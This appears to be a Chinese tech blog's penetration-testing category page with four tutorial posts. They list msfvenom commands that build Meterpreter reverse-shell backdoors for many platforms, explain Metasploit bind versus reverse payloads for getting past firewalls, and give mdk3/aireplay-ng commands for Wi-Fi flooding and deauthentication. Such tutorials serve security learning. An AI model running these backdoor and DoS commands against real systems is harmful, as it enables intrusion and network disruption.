首页
关于
README
Search
1
如何配置终端现代化Neovim
629 阅读
2
mdk3工具使用
463 阅读
3
关于C语言
463 阅读
4
Windows11pro 下载体验
445 阅读
5
关于Docker容器--0×01
375 阅读
默认分类
网络技术
渗透测试
编程语言
C语言
Python
Linux
搞机技巧
Termux
golang
数学
Search
标签搜索
printf
mach
sin cos tan
Toanle
累计撰写
40
篇文章
累计收到
1
条评论
首页
栏目
默认分类
网络技术
渗透测试
编程语言
C语言
Python
Linux
搞机技巧
Termux
golang
数学
页面
关于
README
搜索到
4
篇与
渗透测试
的结果
2021-06-09
关于使用msfvenom生成各类木马后门
免责声明:如果您不确定自己在做什么,请不要尝试在本文中使用任何内容。在windows系统下:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f exe > abc.exe 在安卓下:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=5555 R> apk.apk在Linux下:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 R > /root/Desktop/toanle注意:需要把toanle加权限 chmod +x ./test 在C语言里:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f c > shellcode.c在php:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.php在python里:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.py在java里;msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 W > text.jar在DLL里msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -a x86 -f dll > shell.dll 在asp或者aspx里:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f asp > shell.asp 在C#里:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f csharp > shellcode.txt
2021年06月09日
106 阅读
0 评论
0 点赞
2021-04-27
Metasploit使用指南2
0*00通过之前的学习,我们大致了解了一下metasploit现在我们进入msf学习show exploits显示漏洞利用模块目前自带约2122个show auxiliary显示辅助模块,一般是扫描、拒绝服务、Fuzz测试show payloads显示当前模块支持的载荷
2021年04月27日
152 阅读
0 评论
1 点赞
2021-04-21
metasploit-framework使用指南
注意非合法网络安全人员请离开,谢谢本篇教材仅供参考学习,请勿用于犯罪行为。0*001认识Metasploit Framework是一个编写,测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。使用Metasploit安全测试工具在渗透测试中可以做很多事情,你可以保存你的日志、甚至定义每个有效负载在运行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免费的。基础了解msfupdate用于更新Metasploit服务。msfconsoleShell终端下进入Metasploit模式Stager中几种常见的payload windows/meterpreter/bind_tcp #正向连接windows/meterpreter/reverse_tcp #反向连接,常用windows/meterpreter/reverse_http #通过监听80端口反向连接windows/meterpreter/reverse_https #通过监听443端口反向连接正向连接使用场景:我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机上开了防火墙,只允许访问指定的端口,比如被攻击机只对外开放了80端口。那么,我们就只能设置正向连接80端口了,这里很有可能失败,因为80端口上的流量太多了反向连接使用场景:我们的主机和被攻击机都是在外网或者都是在内网,这样被攻击机就能主动连接到我们的主机了。如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的流量。反向连接80和443端口使用场景:被攻击机能主动连接到我们的主机,还有就是被攻击机的防火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80端口或443端口与外部通信
2021年04月21日
102 阅读
0 评论
0 点赞
2021-03-07
mdk3工具使用
“ MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能”。0x00 前期准备系统环境:Kali Linux将网卡设置为监听模式 airmon-ng start wlan00x01 beacon泛洪攻击可以伪造大量apmdk3 mon0 b -n 单个ssid -c 信道 -s 200 -amdk3 mon0 b -n 单个ssid -w(wep加密) -c 信道 -s 200mdk3 mon0 b -f 文件名 ssid -a -h -c 信道 -s 2000x02 DOS攻击mdk3 网卡 a -a 路由mac -s 攻击速率针对mac地址进行洪水攻击,直到目标无响应0x03 强制解除验证解除连接mdk3 网卡 d -c 信道这样会把使用所有这个信道的路由器的人,全部踹下网或者也可以使用aircrack-ng套件aireplay-ng -0 数量 -a APmac -c 客户端mac 网卡mdk3 wlan b -f bai.txt -c 6 -s 1000 解析:-c 向6 这个频道发送每秒广播1000个数据包 -f 这个参数 是用自己编辑好的文档内容作为SSID去广播不过这个只是针对一个路由器现在mdk3已经停止维护了,官方推出了mdk4了:GitHub地址:https://github.com/aircrack-ng/mdk4That’s all.{mtitle}END{/mtitle}
2021年03月07日
463 阅读
0 评论
1 点赞